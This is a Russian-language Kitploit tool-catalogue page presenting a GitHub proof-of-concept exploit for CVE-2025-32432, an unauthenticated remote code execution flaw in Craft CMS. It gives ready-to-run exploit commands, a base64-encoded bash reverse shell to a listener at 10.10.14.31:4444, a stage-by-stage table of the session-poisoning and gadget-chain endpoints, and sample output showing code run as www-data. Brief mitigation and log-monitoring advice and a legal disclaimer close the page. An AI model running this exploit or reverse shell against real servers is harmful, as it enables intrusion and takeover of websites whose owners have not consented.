Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32432 — Эксплойт, PoC для CVE-2025-32432, CraftCMS2Shell | Kitploit
Инструменты/GitHubGitHub/c0gnit00/cve-2025-32432
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

Эксплойт, PoC для CVE-2025-32432, CraftCMS2Shell

Репозиторий
321 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32432 Craft CMS: PoC эксплуатации RCE без аутентификации

Критическая уязвимость удалённого выполнения кода без аутентификации в Craft CMS

Затронуто: Craft CMS 3.x, 4.x и 5.x (до 5.6.16)

Информация: Эксплойт протестирован на машине Orion из HackTheBox

Обзор

Этот репозиторий содержит PoC-эксплойт для CVE-2025-32432 — критической уязвимости удалённого выполнения кода без аутентификации в Craft CMS. Уязвимость позволяет неаутентифицированному злоумышленнику выполнять произвольный PHP-код на сервере путём эксплуатации механизма привязки поведений (behaviors) Yii2 и инстанцирования PHP-объектов через технику переопределения __class.

Оценка CVSS: 10.0 (критическая)

Возможности

  • Эксплуатация без аутентификации — учётные данные для входа не требуются
  • Универсальная совместимость — работает во всех версиях Craft CMS 3.x, 4.x и 5.x
  • Автоматическое обнаружение ID ассета — автоматически перебирает валидные ID ассетов
  • Извлечение CSRF-токена — автоматически обрабатывает CSRF-защиту Craft CMS
  • Резервный путь к сессии — автоматически повторяет попытку с альтернативными путями к PHP-сессиям, если первый не сработал

Требования

root@kitploit:~
pip install requests urllib3

Быстрый старт

Выполнение команды

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

Обратная оболочка (reverse shell)

root@kitploit:~
# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

Пропуск перебора ID ассета (если он известен)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

Использование альтернативного пути к сессии

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

Использование

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

Пример вывода

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Этапы эксплуатации

ЭтапДействиеКонечная точкаАутентификация
1Извлечение cookie сессии + CSRF-токенаGET /admin/loginНет
2Внедрение PHP-полезной нагрузки в файл сессииGET /index.php?p=admin/dashboard&a=<PHP>Нет
3Перебор валидного ID ассетаPOST /index.php?p=admin/actions/assets/generate-transformНет
4Запуск RCE через гаджет PhpManagerPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>Нет

Затронутые версии

ВеткаУязвимые версииИсправлено в
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

Меры по устранению

  1. Немедленно обновитесь до последней исправленной версии
  2. Отслеживайте логи на предмет:
    • Множественных POST-запросов к /admin/actions/assets/generate-transform
    • GET-запросов к страницам админ-панели с параметром a=, содержащим PHP-код
    • Наличия полей as в теле POST-запросов
  3. Включите правила WAF для блокировки подозрительных паттернов

Авторы

  • Первоначальное обнаружение: Orange Cyberdefense / SensePost
  • Статья в блоге: Расследование реальной кампании с использованием RCE в CraftCMS
  • Автор PoC: на основе исследования SensePost, адаптировано для HTB/пентеста

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Несанкционированный доступ к компьютерным системам является незаконным. Всегда получайте соответствующее разрешение перед тестированием.

Лицензия

Лицензия MIT — подробнее см. в файле LICENSE.

Скачать инструмент